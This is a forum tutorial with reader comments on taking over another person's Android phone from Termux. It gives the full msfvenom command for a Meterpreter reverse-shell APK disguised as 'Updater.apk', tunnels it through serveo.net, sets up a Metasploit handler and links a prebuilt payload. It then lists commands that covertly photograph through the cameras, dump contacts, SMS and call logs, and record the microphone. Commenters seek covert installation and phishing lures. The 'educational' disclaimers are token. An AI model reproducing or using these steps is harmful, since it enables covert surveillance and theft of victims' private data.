How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]

Hi My Brothers!

  • Wanna do some WATCH_DOGS style H4cK1nG...!!! , then you are at Right Place!.
  • You can call it as: "Android to Android Hacking". This method works 100%, so follow my tutorial carefully, it is really very easy to follow (but a bit Complicated). If you got any errors or you think I`ve missed something, then inform me in Comments section. I`ll try best to solve the problem.
  • DISCLAIMER: This Thread is O.N.L.Y for Education Purposes. I will not be Responsible of Any Negative and Illegal use of this information. Try not to HACK the Androids, other than your`s. Or you will be in PRISON. Only Use this information for testing purposes.

So, lets get started...

Requirements

1). Android 5.0 (Tutorial for Androids Lower Than 5.0 is HERE)

2). TermuX Android App (Download it from Play Store

3). Installed Metasploit Framework in TermuX (Tutorial Here)

4). Active Internet/WiFi Connection

5). TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage")

6). MiXplorer (For signing APK file, Download it from UpToDown Website)

7). MiX Signer (APK Signer for MiXplorer, Download it from Play Store)

8). (Recommended) Use Hacker`s Keyboard for entering commands in TermuX easily.

Step 1: Port Forwarding

  • Many People use NGROK for Port Forwarding. But in NGROK, you can see that it always generates a new Domain or Port when you Re-connect to it. Reserved Domain and Port is Unfortunately only available for PAID or their Premium Costumers. That is why, for NGROK you have to generate a new APK file every time you start hacking.
  • BUT HERE... we are gonna use Serveo. In Serveo, you can manually forward your desired port on Internet (and can forward it again in future). To use Serveo Port Forwarding, you have to install OpenSSH package for TermuX. For this, enter this command in TermuX:

pkg install openssh

— It will successfully install OpenSSH
  • After installation, just type this:

ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net

  • It may ask you about default ssh or something like this. Just type "yes" when it ask about it.
  • Here, you have to keep some points in mind; IF you want to forward an HTTP Port, then select different ports in both "Desired_Port" fields. But here we gonna forward a TCP port. To forward TCP port, you have to enter same, desired ports in "Desired_Ports" field. Also, do not change "localhost". Here we are going to Forward a TCP port: 4564 (just for an example). After forwarding port, it may look like this:
  • (Optional) Name this session: Port Forwarding

Step 2: Creating APK File with Embedded Payload

  • To create APK File with Embedded Payload, enter this command in NEW SESSION:

msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
> storage/downloads/Updater.apk

— Link for Updater.apk is in next 3rd Paragraph
  • Wait for a minute...
  • Alright... Now the APK file with Embedded payload is successfully generated here: Phone/SD-Card Storage -> downloads -> Updater.apk
  • (OPTIONAL) You can use APK Editor Pro , to change the name (Default: MainActivity), and Version of the generated APK file.

Note:- If you are not able to generate APK file, then download it from here :
mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc

(Remember: This APK File in not signed! You have to sign it before using, to avoid problems).

Step 3: Signing Newly Generated APK File

To sign the newly generated APK File,

  • Open MiXplorer File Manager and head to "Un-Signed APK File (Updater.apk)" (will be located in downloads folder).
  • Long Press on "Un-Signed APK File (Updater.apk)" and select "MENU button" on top right corner of MiXplorer, then select "SIGN".
  • It will display variety of options to sign APK File (but "AUTO" is preferred).
  • Select "AUTO" to Automatically & Successfully sign the APK file.
  • Now, your APK file: (filename)-signed.apk is successfully signed and fully functional also is of 9.9KB of size.

Step 4: Setup Metasploit in TermuX

  • Activate Metasploit Framework in TermuX by entering this command in new session:

msfconsole

— Metasploit Framework Console

Note(1):- If you have not installed Metasploit-Framework in your TermuX app yet, then follow This Tutorial: Install Metasploit Framework in TermuX on Android

Note(2):- If you are getting this error: Failed to connect to the database , as shown in the below screenshot, enter the following commands in NEW SESSION (Unfortunately You may have to enter these commands every time you open TermuX (in a separate session) . But fortunately entering no such (following) commands, will not affect your Hacking! That`s why, I`m ignoring this error :) :

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

— Thanks to DUST WORLD, for this fix ...!!!
  • Wait for a min...
  • Now, When the msfconsole starts, type the following (Bolded) commands one by one carefully:

msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z

— Enter only BOLDED commands

Step 5: Installing APK in Victim's Android Device

  • Now, Send the Payload-Signed.apk file into your victim`s android device (e.g. via Bluetooth is Recommended) -> Install it -> then open it (Make sure that the victim`s device has an active internet connection).
  • After opening APK file in victim`s phone, you will see that Meterpreter Session in your Metasploit field will be activated. To open the Meterpreter session of your victim`s device, click "Return Button" and enter this Command in Metasploit session:

sessions -i (Session ID)

— (Session ID) = 1 , 2 , 3 , 4 or 5 ...
  • In (Session ID) , select the session number of Meterpreter (i.e. You will see this message when your victim opens the APK file: Meterpreter Session Opened 1 , here , 1 is the session id of Meterpreter Session).
  • If you see the following window, then
  • BINGO.......!!!!!!!! You have successfully hacked your Victim`s Android Device

!!!...Need Some Help While Hacking...???

You can enter: {meterpreter> help} command, for all the available commands, here, I`ve simplified some commands for you.

  • Taking Stealth Snapshot from Front Camera

Just enter this command for this:

webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg

Here, in this command, 2 is representing the front camera. For Back camera, you have to use 1.

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-F.jpg

  • Taking Stealth Snapshot from Rear Camera

Just as the above, but this time, we will use 1,

webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg

Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-R.jpg

  • Fetching All Contacts

To fetch contacts, just enter this command:

dump_contacts -o storage/downloads/X-Contacts.txt

Conacts will be saved in : (Default Write Storage) -> downloads -> X-Contacts.txt

  • Fetching All SMS

Just like above,

dump_sms -o storage/downloads/X-SMS.txt

All the SMS will be saved in : (Default Write Storage) -> downloads -> X-SMS.txt

  • Fetching Call Log

Just enter this:

dump_calllog -o storage/downloads/X-CallLog.txt

Call Log will be saved in : (Default Write Storage) -> downloads -> X-CallLog.txt

  • Spying Through Microphone

Here, you have to edit the duration of the recording microphone (default: 1s). Command for 10 seconds recording is this:

record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3

Spy Recording will be saved in : (Default Write Storage) -> downloads -> X-Spy-Record.mp3

???...Common Problems...???

  • Metasploit not running on TermuX

This might happen, if you do anything wrong in installing TermuX on android. If you see error like GEMS not found, or any this kind of error, simply Delete TermuX with its data, and reinstall it.

  • msfvenom/msfconsole : command not found!

There are two possible reasons for that error.

1). Metasploit is not properly installed on TermuX. That`s why, it was unable to create Command Shortcut. To fix this, uninstall the TermuX, with Data. Then reinstall TermuX and repeat all the Method again. This is actually a script error. I also faced this problem on first time installing Metasploit in TermuX!

2). Metasploit is successfully installed, but was unable to create the shortcut. To manage this, just enter:

  • Manual Way

Just open a New Session and go to metasploit-framework directory, and enter ./msfconsole command, Like This (same for msfvenom):

cd metasploit-framework
./msfconsole
OR
./msfvenom

— 1st command will take U 2 the MSF Directory, and 2nd 1 is 2 start MSF.

2). Shortcut Method

Those people who are not satisfied with the first one, and want to create a shortcut command, as the other programs set, enter the following commands one by one in a new session (msfvenom included):

ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole
mv msfconsole $PREFIX/bin

ln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom
mv msfvenom $PREFIX/bin

— This process is also called Symlinking [Updated]

3). Still no luck (with msfvenom)!? , I`ve uploaded Updater.apk with default (LHOST=serveo.net , LPORT=4564) settings. Download it from there.

  • Why we use serveo.net ...?

As I told before, NGROK does not provede a fixed Domain and Port. So, you have to generate a new APK file, when you plan to hack a phone, you hacked before. See what serveo says about NGROK:

  • Why we are using MiXplorer for Signing the APK File ...?

Actually, there is no Other way to sign the APK file on Android. Otherwise, You have to sign the APP file in Your PC (Specially in Kali LinuX). MiXplorer is the Excellent way to sign the APK file, directly in Android.

  • Metasploit Error: Failed to connect to the Database

Don`t worry about it. We have already made a solution for this :) . I think you have noticed earlier , that I was using "localhost" , instead of 127.0.0.1 or :::0:1 , as HOST. Actually, the "localhost" command automatically connects you to the available Local Host, no matter if it is 127.0.0.1 or :::0.1 or else.

But if you still want to fix it, enter the following commands in New Session of TermuX carefully:

mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start

— Thanks to Dusty World for this FIX
  • Which Android Phone is best for H4ck1nG Purposes ...?

1). Google NeXuS phones/Tablets are Excellent for Hack1nG Purposes. As, they completely supports Kali NetHunter. NetHunter includes all the tools for hacking, and it works as an Android/Windows on a Tablet.

2). But if we talk about Android, Many H4ck3Rs say that Samsung Galaxy S5 is Excellent for Ha4ck1nG Purposes. It has a good Android Version (around 5.0), also Fully supports the TermuX Application.

Note:-

This information is for Educational Purposes Only. I`ll not be responsible of any Negative or Illegal use of this information. Also if you face any type of errors, or you think that I`ve missed something, then tell me in Comments Section. I`ll find the Suitable Solution for that. Anyways, Just use these tricks for FUN... Not for doing Illegal work. We are all Ethical H4ck3Rs, and never invade people Privacies.

Anyway, Thanks for reading my Thread (You can also join our WhatsApp Group for more information and Guides). BEST OF LUCK ...!

|==============> H4ck3R _777 <==============|

Get The Null Byte Newsletter

Never miss a new hacking or security guide

120 Responses

If You Liked My Guide, Then Don't Forget to Give Feedback ...!!!

WOW! It is really (somehow) WATCH_DOGS style hacking! Excellent work h4ck3r 777!

Step 1: Why It? Brother ..Help Me

  • Actually, the problem is might be with your victim`s device. Your victim may not connected to the internet. Or, the apk file is not correctly installed on your victim`s device. Or, you have not started Port Forwarding. These are the possible reasons for this.

me too,like as the problem. I thinks apk file is bug.

Nice ! Tight tight tight tight!!!!!!

So I have everything installed and apparently functioning correctly. Now about the payload deployment. Ehhhhh hardware so I'm using a samsung s8. I have referenced so many sites/tutorials/blogs/forums..... which usb wireless adapter should be used? Most say - TP-Link TL-WN722N N150 High Gain USB Wireless WiFi

But nothing guarantees the chipset is correct or the linux kernel is correct for Termux. This is driving me mad. I feel I've done my homework before coming to you for help. Any suggestions would be appreciated!

Spanx
Spooner

  • Bro, actually I don`t use any USB Wireless WiFi Adapter. So, you have to post your Problem in a separate Forum page. Anyone might help you.

I have quite a problem

Oh and how do i send and install thr payload without social engineering but withoung embeeding it in another apk ?

  • Bro, in your 1st problem, you have entered 192.168.1.125 in your LHOST. But I said that you have to enter the word: localhost , instead of 192.168.1.125 in your LHOST field.
  • Bro, actually this is SOMEHOW legal type hacking. So, you can`t install APK File in your Victim`s Device Remotely!
  • Reinstall Metasploit Please

Brother, how to reinstall it? I I deleted termux and installed metasploit again but it did not Work. I mean the same thing happened again.

  • Did you cleared the data or not !?

Hello my friend !!thanks for tutorials I learned a lot of things with your help but I want to ask you something..when I used the ssh -R 4564:localhost:4564 serveo.net and connecting to a Android ,can this Android or anyone else connect to my phone ??I mean can I be hacked using the shh and exploit to someone ???

!!!... Your Welcome ...!!!

  • Bro, while Port Forwarding , you are just Forwarding a port. Not Exposing Yourself completely. That's why, you can't be hacked, until you install an infected APK file in your Device.

Step 1: Apk Is Not Created

My apk is not created... Please help me

follow my steps

Step 1: Mkdir /Data/Data/com.termux/Files/Home/Storage/Shared/Tmux

Step 2: Msfvenom -P Android/Meterpreter/reverse__tcp Lhost=127.0.0.1 Lport=4444 R>/Data/Data/com.termux/Files/Home/Storage/Shared/Tmux/virus.apk

Step 3: After All Successful Steps. You Find Your Appin Tmux Folder in Filemanage

What if the .apk is Installed on two different victim phones, How do you switch between victims even if that is possible and what is the command for keylogger and video capture. Sorry I am a Noob brother.

When I open the apk in my "victim's" phone, it doesn't show "meterpreter session 1 openned". Why is this happening, help me please

Hey how do I find my own desirable port. Please help. Thanks!!

Hello sir
I love your tutorials they are best and you are sharing a great knowledge to everyone thank you so much for it sir.

Sir i am getting issue while port forwarding i visited servio and found tcp port:1492 but sir its not connecting and the port privided by you 4564 it is also not connecting and the link for updater.apk sir the link is not opening please help sir .

How do I contact you for a paid consult?

apk is not opening in victims mobile

What's the port I use for initial openssh? In place of 4564

I cant open why thé port dont open

Bro, i wanna join ur whatsapp , but it's full...Pl, do needful,
By d way , i am using termux and tried to bind payload with original apk in my android ,
But it shows either key tool not found error or , @rbsys ..../Android Manifest.xml not found error,

I have tried lot to solve it , e.g uninstall & reinstall Termux, Metasploit , Tmuxbunch 2.6 and 2.7 too, follow many youtube methods, Hax4us method, but at the end it's error as I said above...

Help me out plz...
I am using motog3 turbo android 6.1
Thx bro...

bro i am new to hacking. can use .jpj file instead of .apk file. if yes can you give me steps where to change the codes

Hey bro! I'm getting something like this. The apk is not opening in the victim's device. I've signed it too. I tried it in my own phone. But it's not opening. Please help me in this regard bro!

Are you able to uninstall the signed file and stop the hack

I can't install payload signed apk in my victims device?

Sir I am facing problem here, can u help me through this

man o man o mannnn you r absolutely amazing dude seriously you r progressing much better than anybody else....... salute to you brother..

!!!... THANKS ...!!!

  • Thanks DUSTY WORLD for appreciating me and giving amazing Feedback. You touched my heart! Thanks Brother! , :)

wow, man this is really fantastic,

Still i have 3 more questions, an android machine? has to be an telefone, or is there an invoirment on kali linux or windows pc?

and how can we been sure that the victim open the file? what txt message can we best use for open the apk file....
when in the phone, the victim can't see nothing at all?

  • My Bro, as I said, I am using PURE Android on an Android Phone, not an environment on PC.
  • Also, I can guide you, but you have to try this trick at your own mobile first, for better experience. Then if you face any problem, then report it here, I`ll try my best to solve it. But don`t ever try this trick to invade people privacies, because it is totally illegal, and you know, we are Ethical H4ck3Rs.
  • We never Invade People Privacies. Am I Right my Brothers ...!?

!!!... Many Thanks ...!!!

  • Thank You my Brothers: ROSS DAWSON & DUSTY WORLD.

I need to hack my gif S8. I have same phone. I'll pay someone to get me set up. I dont have time for all this shit to learn. Just need access to the unknown.

  • Bro it is very easy to follow my instructions. I`ve made them a lot easier for readers. You can very easily follow these instructions. You don`t have to learn something. Also, I`,m not asking you to learn. Anyway, do as you wish :)

Hey man first of all great guide, but I am facing a issue when I try to create the apk, here is the screenshot:

Its probably because I use ./ at the beginning but only msfvenom command not works for me. I am new in hacking so sorry for stupid questions ;)

  • No, your Question is valid. It is not a stupid Question.
  • Actually, you may not have read it before:
  • Here, in requirements (Option #5), I`ve informed earlier that you should use this command: termux-setup-storage , first of all. This command will create a shortcut to read and write default external storage. Actually you did not created an external write source before. By using this command, you actually enable the TermuX to read/write external default storage (I mean, not root storage).
  • Before following all the steps, Just enter that command first & the problem will be gone.
  • Also, Thanks For Your Good FEEDBACK ...!!!

Still the same issue:

Thanks man appreciate it, keep up the good work.

FOR DENNIS RAZG!!

first of all you have to go to this directory $HOME/metasploit-framework/ then type ./msfvenom. you cannot directly run metasploit-framework in some mobile phones. I dont know the exact issue but maybe it depends from manufacturer to manufacturer. IF YOU WANT TO DIRECTLY USE METASPLOIT MAKE A LINK USING ln -s command or with just simply ln comman. if you want to make your phone READY-TO-HACK device. root it and install kali nethunter in it. if you donot want to root your phone jst install kali linux using app call linux deploy.

HOPE THIS WILL WORK FOR YOU.!!!!!!

>>> DUSTY WORLD :)

  • You are Right DUSTY , but using Kali LinuX via LinuX Deploy is not a proper solution. It takes Tooooooo much Data Storage & Memory. Also, using a Mouse (or a Pointer in Linux Deploy) is difficult. Using mobile internet or WiFi in LinuX deploy is also a very difficult thing to do. I`ve also tried it, but it is not much as reliable as TermuX. Many people use LinuX Deploy to use Metasploit.
  • In TermuX, as you can see, Metasploit can be easily installed, and runs very smoothly. Other Kali Tools like BEEF, JTR, etc. can be easily installed in TermuX. In TermuX you can install your desired packages in it.
  • But, if some people have no problem with running LinuX Deploy, then they have to use it :)

Try giving complete path like

./msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4444 R > /data/data/com.termux/files/home/storage/downloads/updater.apk

(give your own port number which was used in establishing the tcp connection with servo.net)
Now it should work

R > $PWD/../storage/downloads/Updater.apk/
or
R > $HOME/storage/downloads/Updater.apk

Site for the forwarding proxy thingie is blocked by my AV. lol.

  • In order to get data traffic from Payload APK installed on your victim`s device, You have to port forward. If your AV or ISP is blocking port forwarding, then use VPN connection. For android (+ Windows) , Express VPN is best. For Firefox on PC, Hoxx VPN is best.
  • If the problem is with serveo.net, then you can use these port forwarders as alternatives:

1). Beam.io
2). LocalXpose
3). Portmap.io

  • These port forwarders are not as reliable as Serveo, Or use NGROK if you have paid for it.

for everyone TOR is the best of all. right H4CK3R 777!!!!

  • Yeah!, but, It depends on the people, who like to use it :)

Everything works fine but after establishing meterpreter session with the target the files that I get from target (like call log or images) are not accessible because they are getting stored in metasploit_framework folder in com.termux package if I give another folder path I'm getting permission denied. Please tell me if there's any other method to store the call logs or images in our device storage which is accessible. ( sorry for my bad English)

  • Alright, use this command:

termux-setup-storage

— Only for Once
  • Now, you can store your files to Default Write Storage, via a Symlinked Folder: storage , located in TermuX Default directory. Now, Use commands that I listed in !!!...Need Some Help While Hacking...??? Tab, (Or you can take an Idea from those above listed commands).

Bro ,
Can u show me how u access the image files of the victim.I tried but failed .help me..

Thanks..
My connection keeps disconnecting I don't know why.

  • Try to embed it with other APK file. You can find tutorials on it. I`ll soon make an ULTIMATE GUIDE on it. Thanks for Reminding me.

Hello my friend ... I found a problem ...I installed metasploit but will not be recognized when it's called ...

please helpme and thank you

!!!... YouR WeLcoME ...!!!

  • Bro, check the: "???... Common Problems ...!!!" Section above. I`ve already posted the (ULTIMATE) Solution for this :)

However,it does not know commands like wecam.shot
Don't know why...
I've installed really everything.

  • Don`t worry, it happens sometimes. Just reboot your Android phone (and victim`s phone, if you can) , and the problem will be gone.

Hello, I tried every port to connect. All my ports are closed ... please guide...thank

  • DO you mean, you have tried to forward many ports to forward by serveo.net, but nothing worked !?

What is the next option if we don't have access to the receiving phone? Can the payload be applied discretely to another apk?

Thanks

7

YO! The best tutorial I've ever had. Many thanks brother.

!!!... Your Welcome DON LUMINA ...!!!

Can we install fluxion in Termux ?

  • I'm not sure ... Sorry

Can i use it to back up victim whatsapp chat ?

Awesome tutorial im new to using termux. The this is a first step in to learning something a little different. I hope to learn alot from you in the future.

!!!... Thank You ...!!!

  • I'll start uploading my new Tutorials Soon...

hi bro i am new so please can you help me ....i have this problem(loadError) also the Updater.apk is 0.00k

and do you have any kind of book can help me in this feild .thanks bro.

  • What's Your Android Version ?

What is this fucking eror for my bro....?

I always see this eror when i want to set payload

  • Bro ... Are you seeing your internet speed in your screenshot ? Your internet was not stable at that time, that's why you are facing Failed To Bind error. That's all.

No bro i use 4G net with 3mb/s speed

I think this is for port. How can i check a special TCP port is open or not and if it's closed or blocked open it with termux?????

  • Hmm... I think you are right. The problem might be with your port. I've a suggestion for you. Don't ever use these ports : 22 , 443 , 442 , 4444 , and other ports which are familiar to it.
  • Sorry for my late Reply. I'm very busy these days.

What about sending notification to victim phone, like "You won a dollar. Click here to claim it." Or when victim open browser on their phone, we force browser to open URL like "playstore.com"?

  • Yeah, that's an Excellent idea ...!!!
  • I appreciate that...
  • But, it can be done with Armitage on Kali-LinuX.
  • It's not possible on TermuX right now.
  • But we will look into it.
  • Thanks Brother!
  • Some people are also reporting this problem. Try to re-intall Metasploit in TermuX, or wait for any other solution for this. This is actually a new problem.
  • Anyways, what's your Android Version ?

Hi bro H4CK3R_777,
Help me with this problem

Is there something wrong with my Metasploit?

  • Hi
  • As it says, try to execute this command:

gem install bundler

  • If it does`nt work, then try to reinstall Metasploit in TermuX, or use another SCRIPT for the installation of Metasploit.

Can you help me bro? I have entered command Mkdir /Data/Data/com.termux/Files/Home/Storage/Shared/Tmux but only displays the 'no such file directory'

  • Hmm... The problem is might be with the letters you typed. In LinuX` Language, Capital letters behave differently as Small letters.
  • For Example, if you make a folder named: EXAMPLE , and after that, make another folder named: example , in the same directory, then there will be two folders in that directory. It will not ask about replacing the previous folder.
  • But in windows, both types of letters behave similarly.
  • There might be another problem ( because there are Toooooo much possibilities for this error ) .

Sir while executing my payload it send me error mgs like this regularly plz help me how i can resolve this

Hi i am new to hacking and dont know about networking . Please help me. What is this TCP PORT and LOCALHOST ,how to get the desired detail from. What should i fill in the below

ssh -R (DesiredPort):localhost:(DesiredPort) serveo.net

The only way I know is using command "netstat -a"
In command prompt on windows

Download OS manager tool from your browser. It'll show the listening ports of your android device.

Hi, first of all awesome tutorial, but I got a problem: no directory works, and yes, I tryed others folders(havent caught in screenshot), even tryed without any folder, just storage, but I always have this error of no such directory or file.

Any suggestions how to fix it?

Please help me fix this or if you have time please please create one with 5568 as port for me

I have followed the same procedure as you said but this error has come!

u have to replace "(desired_port)" with a specific four digit number

How will i choose port,or can i use,the port you use here

Actually i am getting problem in step 5 i created apk successfully anf installed it in vctim phone but it is not opening in victims phone. Help me plss..

Please help I think that serves is not working properly because ngrok method is working but serves is not working any solution?

Thanks for android msf , bro!
btw, i want to share my tips

  1. combile payload.apk and embedded apk for better hook.

use apktoolX.apk (no need to busy with commends)

  1. target api 22 for runtime permissions problem.

can edit in yaml file

Any idea why i can't set Auto in MiXplorer, and other thing is the link for MiX Signer is out of date, i found another for this, but still can't set auto

great post with step by step tutorial .

if ./msfvenom fail to create payload.. then try this method

for No options error
then try to execute like above screenshot...

nice post its working ...
ty @H4CK3R_777

Unknown command: webcam_snap

type command for help at msf> console

`msf> help`

Same here?? Has anyone solve this prob ?

how to use return button please help me fast and I want to know the time gap between opening the signed apk and generating session id

I already send it to my another phone so can anyone. Help me

Hi mate, nice post. I was wondering one thing, there's some way to put the .apk file or install the .apk file into the victim's phone whitout he realizing?

How to fix segmentation fault, please?

yo this is off topic but im being attacked someone was able to intercept a phone conversation i dont know how to explain it they were able to use my friends caller id and left a voicemail they were also able to while my friend was actually calling when i picked up i would hear someone else idk too much about hacking but is this a man in the middle attack?? is anyone able to eavesdrop on your call and be able to communicate to me while im conversating with someone but not have that person hear just me?

Hey bro! The apk is not opening in the victim's phone as well as in my phone. What shall I do?

Dear bro,

I new to this hacking world. I really thank to you for explaining clearly. I followed all the steps.
For checking purpose I install apk in my mobile and the results was confusing. Kindly help where I did the mistake. Screenshot mention below. Looking for you positive reply

By
Thak

Hi everyone a quick Important note:

1st of all please note that serveo is an open SSH which means you access it from any part of the world , the part where you put the LHOST as serveo.net is the dangerous part, which means the metepreter can be accessed by anyone who has a metasploit framework if they know the port no.

2nd note is setting the payload to android/meterpreter/reverse_tcp , while creating the listener is very important , because default it will be some other payload...

once created and the payload is sent and activated you can ezily connect to the victim from anywhere , with any internet, even if u have dynamic ip etc everything ....AS LONG AS YOU HAVE SET THE LISTENER AND THE SSH FORWARDER TO LOCALHOST AND YOU KNOW THE PORT NUMBER..

EVEN SOMEONE ELSE OTHER THAN YOU ALSO CAN CONNECT TO YOUR PAYLOAD AND GAIN A METERPRETER SESSION...

THIS IS MORE LIKE A DOUBLE EDGE.........

AND OPEN SSH ALSO GIVES THE IP SO BECAREFULL..... THATS ALSO THE ADVANTAGE IN NGROK AND SERVEO , IN NGROK IF YOU PAY THEN ONLY U CAN CONNECT TO YOU PAYLOAD OR ELSE IF U USE SERVEO EVERYONE CAN CONNECT.... SINCE THE PORT NO. IS ONLY 65000 NUMBERS

AND THERE ARE MILLION OF PEOPLE YOU WILL GET A SESSION AS LONG AS OTHERS HAVENT ACTIVELE CONNECTED THE OPEN SSH..

--THANK YOU!!!

Share Your Thoughts

  • Hot
  • Active